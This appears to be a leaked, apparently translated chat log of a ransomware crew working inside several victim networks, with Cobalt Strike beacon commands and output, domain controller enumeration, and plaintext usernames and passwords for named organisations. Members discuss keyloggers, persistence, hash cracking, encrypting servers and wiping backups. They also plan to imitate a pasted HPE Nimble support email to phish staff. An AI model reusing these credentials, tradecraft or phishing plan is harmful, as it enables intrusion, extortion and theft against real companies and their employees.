192.168.45.236:8889 192.168.45.236:5900 192.168.45.236:623 192.168.45.236:443 192.168.45.236:80 192.168.45.236:22 (SSH-2.0-dropbear_0.52) 192.168.45.158:443 192.168.45.158:389 192.168.45.158:143 192.168.45.158:135 192.168.45.158:80 192.168.45.158:25 (220 mail.dixandassociates.com Microsoft ESMTP MAIL Service ready at Wed, 17 Feb 2021 04:22:22 -0800) 
192.168.45.145:6544 192.168.45.145:443 192.168.45.145:80 192.168.45.109:80 192.168.45.43:7680 192.168.45.43:5900 192.168.45.43:5040 192.168.45.43:139 192.168.45.43:135 192.168.45.43:445 192.168.45.158:445 ````192.168.45.170 ``192.168.76.122 ``` User: monitor.acct - IP Address: 10.10.10.114 User: casey.covello - IP Address: 10.10.10.74 User: robert.nye - IP Address: 10.10.10.241 User: SQLAdmin - IP Address: 10.10.20.20 User: tyler.terzigni - IP Address: 10.10.10.77 User: tyler.terzigni - IP Address: 10.10.10.151 User: bknoticing - IP Address: 173.247.171.103 User: jimi.bingham - IP Address: 10.40.10.29 User: Administrator - IP Address: 10.10.10.5 User: Vincent.Velardi - IP Address: 10.10.10.120 ``hyper-v ``gwca-hv-akcelerant.grantweber.com [10.10.10.20]`:zany_face: :zany_face: :zany_face: :zany_face: :zany_face:)not the hostname is the port? trying to log in via vntz viewer what are you doing please tell[ ](https://mediaeveryonecom/direct/aLgWcQx7CGaqXfqkNyJcaRFnKQqepiffHq?msg=KqLs7hjKiZHYtHwRS) is a password...I also can not let through because of this vpn change vnts9005saijdusyd789syd7 `` Recovery Creative ``` disks are on NASA, access is on Danas ``` http://172.17.70.232:5000/ qlyons applecherrypenguinski `````` hqnas2.evo.local photo-nas.evo.local ``Is it there now? The windef is on-try the dll should already have been waiting for action after the lock)`` Maybe no it's not there yet or prophylaxis or they didn't throw it out, it's probably the session died of something us unlikely to have figured out, we wrote above that YES passwords have not changed, just apparently what they had a lag with the authorization oflovid, under the Vpn, but the domain is available[ ](https://mediaeveryone.com/group/evo-com?msg=Dzf6p5uafhY8G45MT) on it like our granddick under the Vpn? 
just spunnom upload the load available HAL.evo.local HQVEEAMPROXY2.evo.local veeamtemp.evo.local ``in the center ``` hq-vcenter-2.evo.local tcooley@evo.local SammySeveDog44 ``Reviewed the bludhound today, you can see that the parallels YES, the closest - changed in SeptemberIt turns out we were not redeemed)in general the creeds have not changed, tried today they are valid. For what reason so is not clear.`https://remote.itc-us.com/rdweb/pages/en-us/password.aspx` on the desktops of the admins saw a change of password, I wonder where it will lead to the creeds ``. beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe Nathan ITC\br_admin CAKE@horse369!@@ [*] Tasked beacon to run .NET program: SharpSniper.exe NathanK ITC\br_admin CAKE@horse369!@@ [+] host called home, sent: 113781 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. ``This is with the token. beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe NathanK [*] Tasked beacon to run .NET program: SharpSniper.exe NathanK [+] host called home, sent: 113721 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. ````NathanK - what computers was he on ? URL : http://itcma-mits01/mitsdiscover/doLogin.md Username : jasonh Password : Fall@ITC2020! `````` URL : http://itcma-mits01/mitsdiscover/doLogin.md Username : brandent Password : HGp752308! --- Chromium Credential (User: brandent) --- URL : https://login.verizonwireless.com/vzauth/UI/Login Username : 5746121367 Password : HGp752301! 
where did you get without a domain
did not take the risk yet where the administrator did not show
pinged all machines yesterday and let the brute force with the domain on the ms17 did not work
this LA - domain user there is a system, no current craps besides the current LA do not roll?
remote.itc-us.com
can itc-us.com be accessed in the file?
this particular pcc 139 445 3389?
is it ok now?
user7 user8 good, already interesting
itc-us.com microadmins, i checked itc-us.com
Some movement has occurred.
No movement so far.
i checked the jjgarcian, aruizmon sessions and found no craps, those that were kerd did not fit
i checked everything and everyone on la and i checked for passwords nothing (glaselbl
> vve8
beacon> sleep 100
?? 0.dead.waterway.com
kobu meemi no more than the kobu we closed in slipknot 1000
+
goodnight until tomorrow = )
Adios, everyone, see you tomorrow
http://vk.com/@thntofff-ataki-na-active-directory-razbiraem-aktualnye-metody-robshihs
all gone
hii
Good morning
May someone open the door?
All have a good night)
loomisco.com
half an hour + - is there time to go away now, or there is time to go away?
ok for the guide that was thrown to him?
without fixing to collect in terms of fixing?
will be new nets, give access to the cobu. need to work out)
hmm?
need your help, then to him to agree to fucking @user4 without 2f, I mb to connect to him?
only more qr code can be confirmed)
the same thing uffpoka replacement need to go through the sessions, then 1 more to go through?
On the second hit it immediately went to 2FA and didn't come up.
+
Yours:
```
CORP:     srvs: per AD: 617    alive: 513    killed: 415 (8 stopped pinging \ 90 masked and killed the process)
          workstations: per AD: 5383   alive: 1,177
EQUIP:    srvs: per AD: 7      alive: 7      shut down: 7
          workstations: per AD: 510    alive: 175
FILIAL:   srvs: per AD: 51     alive: 43     shut down: 43
          workstations: per AD: 1,057  alive: 359
TELEVISA: srvs: per AD: 6      alive: 6      shut down: 6
          workstations: per AD: 5      alive: 0
TSM:      srvs: per AD: 64     alive: 61     shut down: 56 (5 were masked)
          workstations: per AD: 1,287  alive: 488
```
All live workstations were distributed and the build is running, and disks were shared. The VMs' server is encrypted. Found one NAS with old backups; it's been wiped.
equiposoi.com.mx DA
```
televisa.com.mx\EndPoint   <hash redacted>
corp\IWAM_GSCCORP          <hash redacted>
equip\IWAM_GSCEQUIPOSOI    <hash redacted>
filial\IWAM_GSCFILIAL      <hash redacted>
tsm\ES050616T              <hash redacted>
```
CORP\IWAM_GSCCORP <password redacted>
```
Shares for 10.7.39.52:
[--- Listable Shares ---]
Copia de CORPSFEVSWEB02
```
```
krsantiagoc-SNG16843-CHROME   https://home.mcafee.com/Secure/ResetPassword.aspx
jdcardenasm-CHA13887-CHROME   https://home.mcafee.com/Secure/ResetPassword.aspx
                              https://home.mcafee.com/secure/protected/login.aspx
amorela-SFE17310-CHROME       https://dellem.mcafeemobilesecurity.com/resetPin.aspx
```
10.7.215.48
10.7.1.252
10.7.15.239
10.7.215.61
10.7.15.210
10.7.15.137
10.7.15.240
10.7.215.32
10.7.216.36
10.7.15.243
10.7.39.67
10.7.15.118
10.7.39.50
admin <password redacted>
10.7.216.49
administracionbur-CORPKIOVEEAM02-CHROME http://10.7.6.122/Login.aspx
I wrote that, no.
@tl1 Will there be new networks today?
Not everywhere there is a note. Keylogging? To the fact that they are not itching at all...
Well, I see) Waiting for login + alert.
No, it's not alerting anymore.
Minimum 30 minutes.
How long will you wait for the alerts?
At three.
Here, I checked e-mail, as if one.
@user8 does everything; look for files there.
@all where is everyone?
What do we have on the mouth?
So they certainly changed passwords)
Aha, at first the Exchange wasn't available, but the problem was in the proc))
I checked 4 admins, no passwords?
No, I can't get info on rtp in the mail?
Ready at 17:30.
Thank you
+
Keylog is ready. Anyone have blauer?
Does everyone have keylog working?
I have 1, 3; except blauer. I know exactly what I have. Do we all have sessions?
```
displayName: Dianne Jarden
displayName: Brandon Lauer
displayName: Greg Keller
displayName: Mark Harper
displayName: Mike Pusatera
```
Or at 5:00 in the morning?
What are they writing there?
2 people at #1-done-rtpcompany-com. Read the post.
At 4:30. Ready at 5. Work with water at 5.
That's it, it didn't want to go in; it only went in at 10.

The following snapshots listed under volumes or snapshot collections listed under volume collections are not considered *unmanaged* by the Case Automation rules because they are managed by a different process than a retention policy:
a) Triggered by user action; these are considered *manual* snapshots
b) Triggered by third party software, the REST API, or a script; these are considered *externally triggered* snapshots
c) Triggered by HPE Nimble Storage Array due to a user action, such as volume restore, resize, promote, demote; these are considered *manual* snapshots
d) Triggered by an agent (such as VMware VVOL); these are considered *externally triggered* snapshots
e) Triggered by *handover* action; these snapshots are considered *manual* snapshots but currently managed by the retention schedule and require no user action
In situations where the condition above is not resolved, the Case Automation will open another case after the time period defined as "Sleep Time".
The default "Sleep Time" for the Unmanaged Snapshot(s) Case Automation is 12 days, but may be changed, if so desired. If the Array Group was updated to NimbleOS 5.1.x over 90 days ago and unmanaged snapshots are over 90 days old, those snapshots will no longer trigger Case Automation, to avoid repeat notification.
If you wish to no longer have cases opened nor receive case notifications for this alert type, you may disable this alert from generating cases completely for your array as follows: log in to the HPE InfoSight Web Portal at http://infosight.hpe.com/ . Under the Wellness tab:
* Click the "Configure Wellness Rules" button
* To disable case creation and notification for all arrays, uncheck the "Create Issue?" checkbox next to the rule named "Condition Name".
* To disable case creation and notification for a specific array:
  * Expand the "Condition Name" rule by selecting the "+" sign next to the rule name
  * Uncheck the "Create Issue?" checkbox next to a specific serial number.
NOTE: After the automatic case generation has been disabled (removed) for a certain condition, there will not be any more automatic cases created until the case generation is re-enabled manually.
If you have additional questions or require assistance, please reply to this email and an HPE Nimble Storage Support engineer will reach out to you. If you choose to contact HPE Nimble Storage Support by phone regarding this issue, please be sure to provide the case number in order to facilitate a rapid resolution. Telephone and Email Support is available 24x7. Contact details for your location can be found at the following web page: https://www.hpe.com/us/en/services/nimble-storage.html
For your convenience, the following is the U.S.
support contact information:
Toll-free: 1-877-3NIMBLE (877-364-6253), extension 2
Local: 408-432-9600, extension 2
Email: support@nimblestorage.com
For other international support phone numbers, scroll down to the HPE Nimble Support section and expand "Technical Support Phone Numbers" on the webpage: https://www.hpe.com/us/en/services/nimble-storage.html
CASE REFERENCE NUMBER REQUIRED - DO NOT MODIFY ref:_00D80aba6._5002H1HQkfz:ref
NOTE: This is an automated alert sent from Salesforce.com. This email message is for the sole use of the intended recipient(s) and contains confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited.
Alert ID: https://nimblestorage.my.salesforce.com/00X80000001v7Fw
CONFIDENTIALITY NOTICE: The materials enclosed with this email transmission are private and confidential. The information contained in the material is privileged and is intended only for the use of the individual(s) or entity(ies) named above. If you are not the intended recipient, be advised that unauthorized use, disclosure, copying, distribution or the taking of any action in reliance on the contents of this emailed information is strictly prohibited. If you have received this email transmission in error, please notify the sender immediately by return email, delete this communication and destroy all copies.
Thank you.

```
Nimble OS $ snap --list --all --unmanaged
### cut for brevity ###
v1  vc1-vc1s1-2019-04-29::17:56:00.000  10  No  Okay  unknown  default:/  N/A
v2  vc1-vc1s1-2019-04-29::17:56:00.000  10  No  Okay  unknown  default:/  N/A
```
b) Choose an appropriate value for the expiration of the unmanaged snapshots and check which snapshots have already expired, which ones will expire, and when.
NOTE: A negative value shows when snapshots would have already expired; a positive value shows in what amount of time the snapshots will expire, based on the value and units checked.
Syntax: Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl --snap_ttl_unit
Example:
```
Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl 24 --snap_ttl_unit hours
### cut for brevity ###
v1  vc1-vc1s1-2019-04-29::17:56:00.000  default:/  +23.96 hours
v2  vc1-vc1s1-2019-04-29::17:56:00.000  default:/  +23.96 hours
```
c) Select snapshots which you prefer to keep for longer than the rest of the unmanaged snapshots and edit the TTL value directly. This can be done on the snap and snapcoll levels.
Syntax: Nimble OS $ snap --edit --vol --ttl --ttl_unit
Example:
```
Nimble OS $ snap --edit vc1-vc1s1-2019-04-29::17:56:00.000 --vol v1 --ttl 60 --ttl_unit days
```
d) Change TTL to the enabled state and choose appropriate units and value of units.
NOTE: It is recommended to select an expiry unit value higher than any other currently present schedule in order to ensure snapshots have enough retention as required.
Syntax: Nimble OS $ group --autoclean_unmanaged_snapshots yes --snap_ttl --snap_ttl_unit
Example:
```
Nimble OS $ group --autoclean_unmanaged_snapshots on --snap_ttl 30 --snap_ttl_unit days
INFO: Snapshot Time-to-live is set to 30 days.
```
e) Verify the list of unmanaged snapshots has had its expiry time updated as desired:
```
Nimble OS $ snap --list --unmanaged --all
### cut for brevity ###
v1  vc1-vc1s1-2019-04-29::17:56:00.000  10  No  Okay  unknown  default:/  +8.57 weeks
v2  vc1-vc1s1-2019-04-29::17:56:00.000  10  No  Okay  unknown  default:/  +4.29 weeks
```

A new case #04124985 has been created for you with Nimble Storage. Information about the case is listed below.
Account Name: Waterway Gas & Wash Company
Array SN: AF-180176
Array Name: ww-nimble-01
Nimble Group Name:
Case Number: 04124985
Case Priority: P3
Case Category: Snapshots
Case Origin: Autosupport
Case Owner: Support Queue - General
Case Subject: Unmanaged snapshot(s) have been detected due to configuration change
Case Description:
PLEASE NOTE: This is an automatically closed case; if the condition is expected, no reply is required.
Additional information regarding the issue described below is available to you in the form of an HPE InfoSight Knowledge Base (KB) article. Articles are hosted from the HPE InfoSight portal. The link provided will allow direct access for only seven (7) days without requiring that you log in to the InfoSight Portal. Please click on the title link to open or download the article: https://infosight.hpe.com/InfoSight/dispatch?token=eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlbi10eXBlIjoiZG9jdW1lbnRhdGlvbi5rYkFydGljbGUucmVhZCIsImV4cCI6MTYxMDk4OTMyNCwic3ViIjoiQUYtMTgwMTc2IiwiaWF0IjoxNjEwMzg0NTI0LCJrYi1pZCI6IjAwMDA5NiIsImF1ZCI6IlBvcnRhbCIsImlzcyI6IlBhY2hpbmtvIn0.NYZ3RLJ4tRJssRAnJp-nrFQ-GgPkySPqCSsHQ-X5nM4
HPE Nimble Storage Case Automation has detected unmanaged snapshot(s) on your array. The snapshot(s) became *unmanaged* due to a configuration change of the volume collection, schedule, or volume association to a volume collection. In certain situations, snapshot(s) on the downstream replication partner could become unmanaged due to a name change of the volume collection or a schedule on the upstream replication partner. Because the affected snapshot(s) are no longer managed by a schedule, they will remain on the array indefinitely unless the Time-To-Live (TTL) feature is enabled or until they have been removed/deleted manually. As changes accumulate in the parent volume, the snapshot(s) will consume increasing amounts of space.
There are a few considerations regarding the deletion of unmanaged snapshots; please ensure to review the KB article attached to this case for more details. To avoid these cases in the future, you may enable the Time-To-Live (TTL) feature, which is available as of NimbleOS 5.1.x. The feature will automatically expire the snapshots which are considered unmanaged, based on the set period of time. TTL is enabled manually by the user via CLI only. Following are the recommended steps to enable the feature:
a) List current snapshots which are unmanaged; note that the current expiry is set to "N/A", such as in the example:

Come on... let's better copy-paste full-screen messages from the Nimble helpdesk, so they collect some from a neighboring PC or predict user input))))
120 percent, is it? So they generate 20 percent garbage in the output?)))
We only have 1 chance to make the keyloggers work at 120 percent. Where will it flash ctrl, where will it copy from, if there?
```
[ctrl][v] [ctrl][v]
```
OK, now I get the idea that it's realistic. Once could be.
One might think that boganulot to alert about logging in. All you have to do is log in 1 in 1 and you catch the pass in the keylogger.
Will make them log in.
No, they'll do it differently: write on behalf of Nimble)
Well, I mean, will that pass social engineering if they start spamming each other about Nimble?
They sent it a week ago; they wrote it is fresh.
It is fresh, but it is no different from the old ones that they sent earlier and repeat. They send it to each other, but the date is fresh?
Now I will send a screenshot of the letter, to my modest count of 3, and many times they forwarded the last letter between them (also a long time ago).
Nothing more?
A million is how much of ours?
There was only correspondence with the supplier, but it was a million years ago, blah blah blah.
It is for 192.168.0.75. Read more carefully.
I have seen when they communicate, so I didn't meet some Nimble trust, some Nimble contacts.
gkeller: there someone explained to someone about Nimble, as I remember.
Nimble helpdesk. Tell me who they correspond with regarding Nimble files and backups in rtp.
No, there are several sessions in sleep + build and other things. Prepare for this time.
SOCKS, yes. Hang a hundred years.
At 4 start the water keylogger scattered?
No, already; no rts. Check live sessions quickly.
Hello, user 3 is delayed. Where do we have @user3?
hello :space_invader:
Hi, all in place?
hello bro
thanks bro
+
user3
@tl1 please add @user3 here
NTLM hash-stop, and those hashes that Rubeus pulls, can he make tokens with them or not?
@user7 have you skimmed hashes from the trusts yet?
Will we put all hashes on cmd5 and the clears into the farm? I need to feed it with passlists only.
I will suffer because of this situation with Kerberos tickets. I would say if it was brute-forced((
@tl2 @tl1 did any of it get brute-forced?
Look at all of them, they repeat. So there is corp.televisa.com.mx and televisa.com.mx.
S-1-5-21-1935655697-329068152-1801674531
The SIDs are not the same for everyone; not all are correct, more accurately, different....
Crap, the structure is weird again; they are different, e.g.
```
dn:CN=tsm.televisa.com.mx,CN=System,DC=corp,DC=televisa,DC=com,DC=mx
dn:CN=tsm.televisa.com.mx,CN=System,DC=televisa,DC=com,DC=mx
```
Why are....+ repeated exactly the same way?
```
Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:33:32> shell nltest /dclist:televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:televisa.com.mx
[+] host called home, sent: 61 bytes
[+] received output:
Get list of DCs in domain 'televisa.com.mx' from '\\TVSASFEDC01.televisa.com.mx'.
```
```
TVSAKIODC01.televisa.com.mx [PDC] [DS] Site: SFE
TVSASFEDC01.televisa.com.mx [DS] Site: SFE
TVSAAZDC01.televisa.com.mx [DS] Site: AZURE
TVSAAZDC02.televisa.com.mx [DS] Site: AZURE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:35:46> shell nltest /dclist:corp.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:corp.televisa.com.mx
[+] host called home, sent: 66 bytes
[+] received output:
Get list of DCs in domain 'corp.televisa.com.mx' from '\\CORPKIODC02.corp.televisa.com.mx'.
CORPSFEDC02.corp.televisa.com.mx [DS] Site: SFE
CORPKIODC03.corp.televisa.com.mx [PDC] [DS] Site: SFE
CORPSNGDC02.corp.televisa.com.mx [DS] Site: SNG
CORPSFEDC04.corp.televisa.com.mx [DS] Site: SFE
CORPKIODC02.corp.televisa.com.mx [DS] Site: SFE
CORPKLHLQDC01.corp.televisa.com.mx [DS] Site: QRO
CORPKLHLSDC01.corp.televisa.com.mx [DS] Site: SFE
CORPKIODC04.corp.televisa.com.mx [DS] Site: SFE
CORPAZDC01.corp.televisa.com.mx [DS] Site: AZURE
CORPAZDC02.corp.televisa.com.mx [DS] Site: AZURE
CORPCHADC02.corp.televisa.com.mx [DS] Site: SFE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:36:08> shell nltest /dclist:equiposoi.net
[*] Tasked beacon to run: nltest /dclist:equiposoi.net
[+] host called home, sent: 59 bytes
[+] received output:
Get list of DCs in domain 'equiposoi.net' from '\\SOISFEDC01.equiposoi.net'.
SOISFEDC01.equiposoi.net [PDC] [DS] Site: Equiposoi
SOISFEDC02.equiposoi.net [DS] Site: Equiposoi
AZPRDC010.equiposoi.net [DS] Site: Equiposoi
AZPRDC009.equiposoi.net [DS] Site: Equiposoi
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:37:31> shell nltest /dclist:filial.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:filial.televisa.com.mx
[+] host called home, sent: 68 bytes
[+] received output:
Get list of DCs in domain 'filial.televisa.com.mx' from '\\FILIALSFEDC05.filial.televisa.com.mx'.
```
```
FILIALSFEDC05.filial.televisa.com.mx [PDC] [DS] Site: SFE
FILIALSFEDC02.filial.televisa.com.mx [DS] Site: SFE
FILIALAZDC01.filial.televisa.com.mx [DS] Site: AZURE
FILIALAZDC02.filial.televisa.com.mx [DS] Site: AZURE
FILIALSFEDC01.filial.televisa.com.mx [DS] Site: SFE
Filialazdc03.filial.televisa.com.mx [DS] Site: AZURE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:38:08> shell nltest /dclist:tsm.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:tsm.televisa.com.mx
[+] host called home, sent: 65 bytes
[+] received output:
Get list of DCs in domain 'tsm.televisa.com.mx' from '\\TSMSFEDC01.tsm.televisa.com.mx'.
TSMSFEDC05.tsm.televisa.com.mx [PDC] [DS] Site: SFE
TSMAZDC01.tsm.televisa.com.mx [DS] Site: AZURE
TSMAZDC02.tsm.televisa.com.mx [DS] Site: AZURE
TSMSFEDC01.tsm.televisa.com.mx [DS] Site: SFE
TSMAZDC03.tsm.televisa.com.mx [DS] Site: AZURE
The command completed successfully
```
The fuckup came out: there are 5 trusts, and in adinfo they repeat.
Was the build new?)
And if I start the DLL, it will essentially only come after the time that was specified in the builder.
`Task SvcRestartTask#27778 22/01/2021 01:38:45 p. Ready`
No.
+
SYSTEM rights yet?
`CORPSFECRT04`
Hooked up a session on adinfo 14a. How many are there? Or not?
And just in case, in some of the trusts I'll drop a proper persistence. As soon as the VPN turns on, I'll immediately persist on the server (the last login there was in June 2020), and I can only persist for you.
OK, yes, persist on the user-level one, and who knows when your VPN turns on.
Rebuilt shellcode. Haven't you persisted the session yet? Found a server where you can persist.
Is there a session alive? If so, can you spam it to me; shellcode above.
Understood.
Backups: machines in the lock or in the trash? Backup information. Why do we need them?
virtualkuks\machines is a backup of what?
Yes, most likely we'll take the small ones)) :-)
Let's better take 7.8k backups.
20 GB backups, should we download?)
Good day)
Good night everybody
Good night
60 until tomorrow. How much tomorrow? By 12:00.
Good guys, clean up after yourself, put it in sleep, and see you tomorrow.
DB
DB Server?
```
HandleCount  Name                      Priority  ProcessId  ThreadCount  WorkingSetSize
0            System Idle Process       0         0          4            20480
627          System                    8         4          97           319488
50           smss.exe                  11        268        3            1105920
506          csrss.exe                 13        368        9            4775936
79           csrss.exe                 13        432        8            3506176
82           wininit.exe               13        440        2            4005888
110          winlogon.exe              13        468        3            5652480
326          services.exe              9         532        6            12713984
837          lsass.exe                 9         540        7            17625088
311          svchost.exe               8         648        6            8196096
160          SEDService.exe            8         680        9            11509760
335          svchost.exe               8         740        7            7692288
427          svchost.exe               8         812        12           18022400
303          LogonUI.exe               13        848        11           36507648
172          dwm.exe                   13        860        5            54202368
1487         svchost.exe               8         888        42           93220864
659          svchost.exe               8         932        15           13438976
740          svchost.exe               8         1136       18           24133632
353          svchost.exe               8         1280       17           11767808
331          spoolsv.exe               8         1472       11           9891840
97           svchost.exe               8         1504       8            8261632
92           pg_ctl.exe                8         1532       3            5369856
360          postgres.exe              8         1776       3            68055040
42           conhost.exe               8         1784       2            3186688
305          postgres.exe              8         1868       3            5214208
304          postgres.exe              8         1936       2            31318016
303          postgres.exe              8         1944       2            13168640
304          postgres.exe              8         1952       2            13938688
304          postgres.exe              8         1960       2            7790592
304          postgres.exe              8         1968       2            5484544
412          SSPService.exe            8         1296       83           18669568
262          svchost.exe               8         2516       10           11796480
141          tvnserver.exe             8         2548       13           5283840
116          VGAuthService.exe         8         2656       3            10964992
311          vmtoolsd.exe              13        2696       9            91119616
112          ManagementAgentHost.exe   8         2716       9            10297344
153          svchost.exe               8         2740       17           9199616
110          WinCollectSvc.exe         8         2764       4            11280384
992          tomcat7.exe               8         2900       67           607748096
30           conhost.exe               8         2908       2            3112960
324          WmiPrvSE.exe              8         3124       10           22228992
383          svchost.exe               8         3456       19           9252864
109          svchost.exe               8         3600       4            4788224
195          dllhost.exe               8         3772       11           11304960
162          msdtc.exe                 8         3860       10           7917568
308          postgres.exe              8         4344       3            9498624
308          postgres.exe              8         4360       3            9510912
308          postgres.exe              8         4376       3            9502720
523          postgres.exe              8         4392       3            50176000
550          postgres.exe              8         4408       3            57700352
313          RouterNT.exe              8         4936       21           9162752
120          GoogleCrashHandler.exe    4         5096       4            1314816
105          GoogleCrashHandler64.exe  4         5116       4            942080
463          WinCollect.exe            8         3576       45           21114880
30           conhost.exe               8         3900       2            3145728
221          WmiPrvSE.exe              8         3764       8            27688960
205          WmiPrvSE.exe              8         4700       7            15343616
328          ManagementAgentNT.exe     8         1524       20           7852032
147          swc_service.exe           8         1056       6            6971392
634          SavService.exe            8         4568       74           391532544
150          SAVAdminService.exe       8         1288       7            3428352
230          swi_service.exe           8         2580       15           20467712
95           swi_filter.exe            8         1748       4            4517888
138          swi_fc.exe                8         976        7            20144128
141          ALsvc.exe                 8         1808       7            2506752
```
Write in DB + these VMs.
```
Image Name                PID   Session Name  Session#  Mem Usage  User Name                     CPU Time
System Idle Process       0     Services      0         20 K       NT AUTHORITY\SYSTEM           10683:04:24
System                    4     Services      0         312 K      N/A                           0:38:33
smss.exe                  268   Services      0         1,080 K    NT AUTHORITY\SYSTEM           0:00:00
csrss.exe                 368   Services      0         4,664 K    NT AUTHORITY\SYSTEM           0:00:28
csrss.exe                 432   Console       1         3,424 K    NT AUTHORITY\SYSTEM           0:00:00
wininit.exe               440   Services      0         3,912 K    NT AUTHORITY\SYSTEM           0:00:00
winlogon.exe              468   Console       1         5,520 K    NT AUTHORITY\SYSTEM           0:00:00
services.exe              532   Services      0         12,416 K   NT AUTHORITY\SYSTEM           0:01:19
lsass.exe                 540   Services      0         17,168 K   NT AUTHORITY\SYSTEM           0:12:01
svchost.exe               648   Services      0         8,004 K    NT AUTHORITY\SYSTEM           0:01:00
SEDService.exe            680   Services      0         11,240 K   NT AUTHORITY\SYSTEM           0:00:00
svchost.exe               740   Services      0         7,516 K    NT AUTHORITY\NETWORK SERVICE  0:03:24
svchost.exe               812   Services      0         17,636 K   NT AUTHORITY\LOCAL SERVICE    1:28:40
LogonUI.exe               848   Console       1         35,652 K   NT AUTHORITY\SYSTEM           0:00:00
dwm.exe                   860   Console       1         52,932 K   Window Manager\DWM-1          0:00:00
svchost.exe               888   Services      0         91,004 K   NT AUTHORITY\SYSTEM           2:47:42
svchost.exe               932   Services      0         13,124 K   NT AUTHORITY\LOCAL SERVICE    0:00:02
svchost.exe               1136  Services      0         23,568 K   NT AUTHORITY\NETWORK SERVICE  0:01:59
svchost.exe               1280  Services      0         11,484 K   NT AUTHORITY\LOCAL SERVICE    0:00:08
spoolsv.exe               1472  Services      0         9,660 K    NT AUTHORITY\SYSTEM           0:00:09
svchost.exe               1504  Services      0         8,056 K    NT AUTHORITY\SYSTEM           0:00:00
pg_ctl.exe                1532  Services      0         5,244 K    NT AUTHORITY\NETWORK SERVICE  0:00:00
postgres.exe              1776  Services      0         66,460 K   NT AUTHORITY\NETWORK SERVICE  0:00:00
conhost.exe               1784  Services      0         3,112 K    NT AUTHORITY\NETWORK SERVICE  0:00:15
postgres.exe              1868  Services      0         5,092 K    NT AUTHORITY\NETWORK SERVICE  0:00:00
postgres.exe              1936  Services      0         30,584 K   NT AUTHORITY\NETWORK SERVICE  0:00:01
postgres.exe              1944  Services      0         12,860 K   NT AUTHORITY\NETWORK SERVICE  0:00:00
postgres.exe              1952  Services      0         13,612 K   NT AUTHORITY\NETWORK SERVICE  0:00:00
postgres.exe              1960  Services      0         7,608 K    NT AUTHORITY\NETWORK SERVICE  0:05:19
postgres.exe              1968  Services      0         5,356 K    NT AUTHORITY\NETWORK SERVICE  0:00:30
SSPService.exe            1296  Services      0         18,232 K   NT AUTHORITY\SYSTEM           0:00:01
svchost.exe               2516  Services      0         11,520 K   NT AUTHORITY\SYSTEM           0:00:30
tvnserver.exe             2548  Services      0         5,160 K    NT AUTHORITY\SYSTEM           0:00:01
VGAuthService.exe         2656  Services      0         10,708 K   NT AUTHORITY\SYSTEM           0:00:00
vmtoolsd.exe              2696  Services      0         88,984 K   NT AUTHORITY\SYSTEM           1:09:42
managementAgentHost.exe   2716  Services      0         10,056 K   NT AUTHORITY\SYSTEM           0:00:00
svchost.exe               2740  Services      0         8,968 K    NT AUTHORITY\SYSTEM           0:00:02
WinCollectSvc.exe         2764  Services      0         11,012 K   NT AUTHORITY\SYSTEM           1:58:18
tomcat7.exe               2900  Services      0         593,504 K  NT AUTHORITY\SYSTEM           1:42:09
conhost.exe               2908  Services      0         3,040 K    NT AUTHORITY\SYSTEM           0:00:00
WmiPrvSE.exe              3124  Services      0         21,804 K   NT AUTHORITY\NETWORK SERVICE  1:55:22
svchost.exe               3456  Services      0         9,036 K    NT AUTHORITY\NETWORK SERVICE  0:00:01
svchost.exe               3600  Services      0         4,676 K    NT AUTHORITY\NETWORK SERVICE  0:00:00
dllhost.exe               3772  Services      0         11,040 K   NT AUTHORITY\SYSTEM           0:00:00
msdtc.exe                 3860  Services      0         7,732 K    NT AUTHORITY\NETWORK SERVICE  0:00:00
postgres.exe              4344  Services      0         9,276 K    NT AUTHORITY\NETWORK SERVICE  0:00:00
postgres.exe              4360  Services      0         9,288 K    NT AUTHORITY\NETWORK SERVICE  0:00:00
postgres.exe              4376  Services      0         9,280 K    NT AUTHORITY\NETWORK SERVICE  0:00:00
postgres.exe              4392  Services      0         49,000 K   NT AUTHORITY\NETWORK SERVICE  0:00:18
postgres.exe              4408  Services      0         56,348 K   NT AUTHORITY\NETWORK SERVICE  0:00:09
RouterNT.exe              4936  Services      0         8,948 K    NT AUTHORITY\SYSTEM           0:00:23
GoogleCrashHandler.exe    5096  Services      0         1,284 K    NT AUTHORITY\SYSTEM           0:00:05
GoogleCrashHandler64.exe  5116  Services      0         920 K      NT AUTHORITY\SYSTEM           0:00:00
WinCollect.exe            3576  Services      0         20,620 K   NT AUTHORITY\SYSTEM           28:12:27
conhost.exe               3900  Services      0         3,072 K    NT AUTHORITY\SYSTEM           0:00:00
WmiPrvSE.exe              3764  Services      0         22,964 K   NT AUTHORITY\SYSTEM           0:41:26
WmiPrvSE.exe              4700  Services      0         14,984 K   NT AUTHORITY\SYSTEM           0:04:57
ManagementAgentNT.exe     1524  Services      0         7,632 K    NT AUTHORITY\SYSTEM           0:03:39
swc_service.exe           1056  Services      0         6,776 K    NT AUTHORITY\SYSTEM           0:00:00
SavService.exe            4568  Services      0         382,324 K  NT AUTHORITY\LOCAL SERVICE    1:06:09
SAVAdminService.exe       1288  Services      0         3,348 K    NT AUTHORITY\SYSTEM           0:00:03
swi_service.exe           2580  Services      0         20,016 K   NT AUTHORITY\SYSTEM           0:00:01
swi_filter.exe            1748  Services      0         4,412 K    NT AUTHORITY\SYSTEM           0:00:00
swi_fc.exe                976   Services      0         19,672 K   NT AUTHORITY\SYSTEM           0:00:05
ALsvc.exe                 1808  Services      0         2,440 K    NT AUTHORITY\SYSTEM           0:01:01
```
Processes from one to the studio.
tomcat
Here, these 4 more?
TLCAutoTF2.loomisco.com
TLCANALYTICS1.loomisco.com
